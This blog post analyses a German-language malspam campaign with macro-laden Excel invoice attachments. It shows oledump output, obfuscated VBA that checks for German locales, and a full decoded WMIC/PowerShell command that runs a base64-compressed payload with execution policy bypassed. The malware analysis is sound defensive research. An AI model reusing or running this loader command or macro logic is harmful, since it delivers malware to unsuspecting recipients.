This research was performed by Martijn Grooten, Peter Karsai and Ionuț Răileanu.
On this blog we have regularly reported on the tendency among malicious spam campaigns to be smaller in scale and more targeted, thus improving their chances of evading spam filters ─ indeed, we described exactly this strategy two days ago when
writing about Emotet
.
However, there are always exceptions to such trends: yesterday morning we spotted two fairly large spam campaigns with
Excel
attachments. The campaigns, which were in German, were everything that most malspam campaigns are not: large in scale, sent to many older spam traps, and with the same attachment shared by all emails in the campaign.
Such a campaign can be reasonably successful for the spammer if emails are sent in a short burst, allowing them to stay ahead of the email security products. Indeed, we noted that some of the emails, especially the earlier ones, were missed by some of the products in our
test lab
.
The emails were all written in German and promised a bill in the attachment, which was an
Excel
file.
The following analysis is based on the attachment seen in the first campaign (SHA256: e108ca0f32af1ad5d73a8be3d8b954fd74a9187fe3ff5debb5007dc8ec1c3ce4).
The go-to tool for manual analysis of (potentially) malicious documents is Didier Stevens’
oledump.py
. Running
python oledump.py Rechnungskopie_INV_00156696.xls
showed that the file consists of 18 streams (the upper case M next to stream 12 indicates it contains VBA macros):
1: 111 '\x01CompObj'
2: 248 '\x05DocumentSummaryInformation'
3: 208 '\x05SummaryInformation'
4: 96 'Ctls'
5: 112 'MBD034C119A/\x01CompObj'
6: 92 'MBD034C119A/f'
7: 0 'MBD034C119A/o'
8: 34601 'Workbook'
9: 507 '_VBA_PROJECT_CUR/PROJECT'
10: 83 '_VBA_PROJECT_CUR/PROJECTwm'
11: m 1005 '_VBA_PROJECT_CUR/VBA/DieseArbeitsmappe'
12: M 5974 '_VBA_PROJECT_CUR/VBA/Tabelle1'
13: 3631 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
14: 2424 '_VBA_PROJECT_CUR/VBA/__SRP_0'
15: 499 '_VBA_PROJECT_CUR/VBA/__SRP_1'
16: 654 '_VBA_PROJECT_CUR/VBA/__SRP_2'
17: 1594 '_VBA_PROJECT_CUR/VBA/__SRP_3'
18: 803 '_VBA_PROJECT_CUR/VBA/dir'
The macros were unpacked using the command
python oledump.py Rechnungskopie_INV_00156696.xls -s 12 -v
. We found dozens of lines of obfuscated VBA code. Though the primary goal of obfuscation is to evade detection, it also acts to frustrate researchers and it isn’t immediately clear what the code does. A few things stand out though.
First, there is code that is run when the macro is activated that checks for one of five locales ─ if the locale is not set to one of these values the execution of the program ends:
Function Ansichn()
loba = msoLanguageIDUI: sAb = Application.LanguageSettings.LanguageID(loba)
fq = 2055: fw = 4103: fe = 5127: fr = 1031: ft = 3079
If fq = sAb Or sAb = fw Or fe = sAb Or sAb = fr Or ft = sAb Then Dateii Else ActiveWindow.Close savechanges:=False
End Function
Unsurprisingly, given the language of the campaign, these locales correspond to five German language locales ─ those for Switzerland (2055), Luxembourg (4103), Liechtenstein (5127), Germany (1031) and Austria (3079).
The second notable thing is that the core function refers to several cells in the spreadsheet.
Function Veranke()
aq = "": am = ""
For i = drukk / 2 To drukk - 5
If i < 16 Then
aq = aq + Kaaten(Cells(i, (drukk / 8) + 1))
Else
am = am + Kaaten(Cells(i, (drukk / 12) + 2))
End If
Next i
Shell aq + tapo(drukk, drukk / 3) + am, msoPickerFieldUnknown: ActiveWindow.Close savechanges:=False
End Function
(The function
tapo
is defined to be a copy of
Cell
, which reads the content of a cell.)
In white and very small font, the cells contain strings that are used to generate a shell command. The generation of this command is rather cumbersome by hand, but a debugger like
ViperMonkey
can help us automate part of this talk. It helped us find the following shell command
:
wmIc "ProCESS" "cAlL" 'CreaTE' "pOwErSHelL -exEc BypaSS -win 01 -noPr -NONInTErAcTi -cOMM .( $PshomE[21]+$pShoME[34]+'x') ( "\"(nEw-ObJeCt SYStEm.Io.CoMpReSsIon.defLATEstreAM( [iO.meMorYSTReAm] [SysTem.CoNVert]::FRomBASe64sTRinG( 'dVQNb+I4EP0rFqJ1fCRREqAHRdHdbptuqViqK7C9E4uUNHEgNCRsYihc1v/9ZpLQj9OdhLHj+fCbN88Od4kvojQhzqMyjxKxaBY/JCuaRSht02irptmthwmjo3Z/VTsX+DONPgxD7cNkop9RbZWzpXa6ar9Xf/XAfxCmGff8ldIsbtwbSaKEwApOmvsrL1vU261m8YdkUg6aRfYg7fmUH4TuJH4aRMlycXk5m970wHYrbesXCxaROxvO3OFO2udKozBkYcnClA2ihXTMqUqf1twXML9o95QRcGmXLh30AveGFhKKdp7Anw5jzPHzkT9dxRFlg/DEzu0tINyXxCwB11Wa7HkmANFNlm4+ezm/6ExEBiDB7Ztkg4yLXYYlfpEDrCZ176Vd4gW00U7q1+lLEqdeUEcpiq5Q/gIgm8U0c2eOZERbp1FCYatFKRCzki2qbyl+0NX2N9pSTF23DPKTnCv0jLKC0MK4/FNSqJ5AugbWaNVl0nQDdX3hQnvwYJEEkFb76h2IecHI6SwChwHWY4BQHXfsfnMvhfN1iwUMZ9KG2gJJbKJXXNdELyGfH5XIj24gf+oVza/NQI5LVhGBlnlJkMJiSRnTE2/DiZbxbez5nDT0oiubDTjsbo0I/rqGir9j6XA41E7BIlwHTfduKvV895RX7BkqagKx/w0GYld86xnfpHteWlellVfRpZOWb+NIEIDyTppOLUyHy7mxwG7HI2n/rmBw4o4xeOpIfZpegWg/ZZl3LE1c2tC+1YoyBT8YZoRVJG0DqYPDYkHQovvpLhHlXqtVpo8ladmkvgTzz0fBF+g4x+gF0Z4OaXbaHSe4PZRnsBzXqRbVZfEmCO3BfZA69PhVibE7kgz4cxw5NxeDeZTqYRRzkO1jFgn+KY4xdQ6e67VUlbcaPuXyQ18sw4DOMMYGUago56/9x94ufeCw6v/avZNMH/FkKVZlzRBnsIIfIiEHtSIrOW4hJo85hzDTfLtmz+5oAqw8u3l1o18VjJqmwb9EfNJwH1ARQP0MqM8sovEfxEByh9CwuQeZ955IM6jahz4LHiW58BKfK3Nx3CIZSy5wFcJV9uM8CuBg3+h5YdA3tNDyTM00A1PrdbpdzTA8w++bYbvXA1QMmz8EXehB6u82PBG6twVZ+R5Wo2+9DLfyFY9jfuD+TnDlRB3UVbKX7arrqNI4bluUqQoltNVortek0aLOHhJM4MJHMHLBN+jQQE7aH14xauEjtmnD/9XlI/YDH7Qgfcknx1xAEMp3NoqlajDJ45wXepXGfGPXKoEACpgB1amf9av5/i2ZRCUUle7xjU3wbjsUhfjhYSD0GavK4U3539b334VgRLmvggsj7e5/6XUUJZVe76Q6z/iSH8BYCxW2p1yq9Pt1+ZgzPLc8/x8=') ""\"" + ([CHAr]44).ToStrInG() + ""\"" [iO.COmpRESsion.COmpRessionMOde]::DEcoMprEsS)|forEacH { nEw-ObJeCt SysTEM.io.StREAMReAder( `$_ ""\"" + ([CHAr]44).ToStrInG() + ""\""[tExt.EnCODING]::ASCIi)}).ReADTOEnD( )|.( `$eNV:comsPec[4""\"" + ([CHAr]44).ToStrInG() + ""\""15""\"" + ([CHAr]44).ToStrInG() + ""\""25]-JoIN'')""\"" )""
by
Tags:
Leave a Reply